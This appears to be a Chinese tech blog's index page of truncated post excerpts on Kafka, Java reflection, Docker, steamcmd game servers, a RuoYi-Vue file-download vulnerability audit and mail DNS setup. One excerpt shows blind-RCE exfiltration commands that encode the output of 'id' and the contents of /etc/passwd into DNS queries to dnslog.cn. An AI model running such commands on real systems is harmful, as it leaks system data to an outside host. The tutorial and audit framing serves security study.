1.kafka下载和安装 下载地址 https://kafka.apache.org/downloads 直接下载.tgz 解压即安装完成 1$ tar -xvf kafka_2.13-3.7.1.tgz 2.启动运行2.1.通过zookeeper启动 通过zookeeper 启动 kafka 1234567891011121314# 先启动zookeeper 先进入目录下得bin目录$ ./zookeeper-server-start.sh ../config/zookeeper.properties &# 关闭zookeeper $ ./zookeeper-server-stop.sh ../config/zookeeper.properties# 启动kafka$ ./kafka-server-start.sh ../config/server.properties &# 关闭kafka$ ./kafka-server-stop.sh ../config/server.properties# 可以使用命令查看端口是否开启$ netstat -nlpt ...

1.简介 在很多时候我们拿到一个RCE漏洞时可能存在没有回显的利用链，那么在这时，就需要我们通过出网，将我们执行命令的结果外带出来，以此来观察执行命令的结果。 其中我们主要是通过输入“$(cmd)”可以将执行命令的结果以请求参数的形式外带出来。 2.外网dnslog获取dnslog https://dnslog.cn/ 1234567891011121314151617181920$ dig $(echo -n $(id) | base64 | head -c 63).g8mpq4.dnslog.cn# 命令解读， dig 解析域名 ，$() 调用返回结果作为参数调用，id 需要命令执行字符串，BASE64 将$(id)执行的结果进行BASE64编码，便于传输，head -c 63 只输出前0-63个字符，如果不足则全部输出# 如果说只需要取其中一段命令结果$ echo -n $(cat /etc/passwd) | base64 | head -c 127 | cut -c 64-# 这样就可以取到64到127的BASE64的字符串了，cut -c 64- 表示从第64个字符开始到 ...

1.简介 Java Reflection 反射机制允许程序在执行期借助于ReflectionAPI取得任何类的内部信息(比如成员变量，构造器,成员方法等等)，并能操作对象的属性及方法。反射在设计模式和框架底层都会用到 加载完类之后,在堆中就产生了一个Class类型的对象(一个类只有一个Class对象)，这个对象包含了类的完整结构信息。通过这个对象得到类的结构。这个对象就像一面镜子，透过这个镜子看到类的结构,所以,形象的称之为:反射 Java程序计算器的三个阶段 2.简单案例 Cat.java 1234567891011package com.gaomu.reflection.mode;import java.io.IOException;public class Cat { private String name = "招财猫"; public void hi(){ System.out.println(name +": 汪汪！"); }} Refl ...

1.简介 使用本地windows10系统+云服务器frp实现雾锁王国 (Enshrouded)联机服务及搭建。 本地服务器官方推荐配置6核16G 2.Win10安装steamcmd cd C:\steamcmd 下载steamcmd 解压后，双击安装 再次双击运行下载后的steamcmd.exe，验证更新 关闭命令终端 3.下载安装服务器 官方介绍 在当前目录打开cmd 运行命令steamcmd +login anonymous +app_update 2278520 validate +quit **cd C:\steamcmd\steamapps\common\EnshroudedServer ** 双击运行enshrouded_server.exe初始化服务器 关闭命令终端，打开当前目录初始化服务器新增文件enshrouded_server.json文件，可修改服务器启动参数 12345678910{ "name": "Enshrouded Server", "password": & ...

1.docker数据卷1.1.简介 实现宿主机和容器之间的文件或者文件的同步，一般用来解决容器的持久化存储或者是宿主机和容器之间的数据共享 1.2.操作 设置数据卷 12345678910111213141516# 绝对路径$ docker run -v 数据机目录:容器目录[读写权限] 镜像名# 别名 如果不存在对应数据卷，docker将自动创建$ docker run -v 数据卷: 容器目录[读写权限] 镜像名# eg:$ docker run -d -p 80:80 -v nginx_html:/usr/share/nginx/html nginx# 查看数据卷$ docker inspect 容器id# 列出数据卷$ docker volume ls# 查看数据卷详细信息$ docker volume inspect 容器名# 创建数据卷$ docker volume create 数据卷名# 删除数据卷 rm -f强制删除，但不能删除使用中的数据卷$ docker volume rm 数据卷名 2.Dockerfile2.1.简介 dockerfile可以用来定义镜像 ...

1.安装docker engine 非ubuntu其他系统安装docker官方手册 前置 1234567891011121314# 添加Docker官方GPG密钥:sudo apt-get updatesudo apt-get install ca-certificates curl gnupgsudo install -m 0755 -d /etc/apt/keyringscurl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpgsudo chmod a+r /etc/apt/keyrings/docker.gpg# 添加apt仓库源:echo \ "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \ $(. /etc/ ...

1.安装steamcmd 请勿使用root安装steamcmd 当前系统ubuntu 20.04 server live 64位 12345678# 请使用非root用户安装# 我的64位ubuntu系统因此需要安装其余依赖，32位ubuntu可直接安装steamcmd 命令：sudo apt install steamcmd$ sudo add-apt-repository multiverse$ sudo dpkg --add-architecture i386$ sudo apt update$ sudo apt install lib32gcc-s1 steamcmd # 添加一个快捷方式$ ln -s /usr/games/steamcmd steamcmd 其他系统安装命令 运行steamcmd 12345# 因为我们创建了快捷方式，因此直接输入命令即可启动$ steamcmd# 页面出现 steamcmd>时表示已经进入了steamcmd的命令终端# 可以使用以下命令匿名登陆$ login anonymous 2.安装PalServer专用服务器 ...

1.开发测试环境搭建(审计环境)1.1.开发环境 RuiYi-Vue历史版本下载地址 安装IDEA 配置Maven 安装Mysql 创建数据库ry-vue 运行下载源码中的sql 获得如下表 修改连接数据库的用户名密码、路径 启动redis 启动后端环境 运行前端环境 安装nodejs 123$ cd ruoyi-ui$ npm install # 安装node_modules依赖$ npm run dev # 启动前端开发环境 2.历史漏洞2.1.任意文件下载2.1.1.低版本(<V-3.2.0)2.1.1.1.简介 该漏洞是由于在RuoYi-Vue低版本文件下载接口 /common/download/resource 中未对输入的路径做限制，导致可下载任意文件。 2.1.1.2.代码审计(V-3.0) 接口位置 com/ruoyi/web/controller/common/CommonController.java 文件下载默认路径ruoyi-admin\ ...

源代码下载 git项目地址 1. 域名解析​ 域名解析一共需要解析六条数据包括一条A记录，MX记录，和4条TXT记录 A记录，mail指向自己得服务器IP，NAME: mail ，CONTENT: <公网IP>（同时需要在VPS上配置rDNS，用于防止垃圾邮件过滤） MX记录 NAME: @ , CONTENT: <完整二级域名>，eg: mail.example.com 优先级为10 TXT SPF记录，NAME: @, CONTENT: v=spf1 mx -all TXT _dmarx记录， NAME: _dmarc CONTEXT: v=DMARC1; p=reject; adkim=s; aspf=s 证书TXT解析 acme-challenge.mail 记录，需要动态生成 NAME: _acme-challenge.mail , CONTENT: <动态生成>, eg: I9zcK5Us5ae6sUaxczP5GH9lHqiasoxvcJTGGckhQAw DKIM解析 ，NAME ...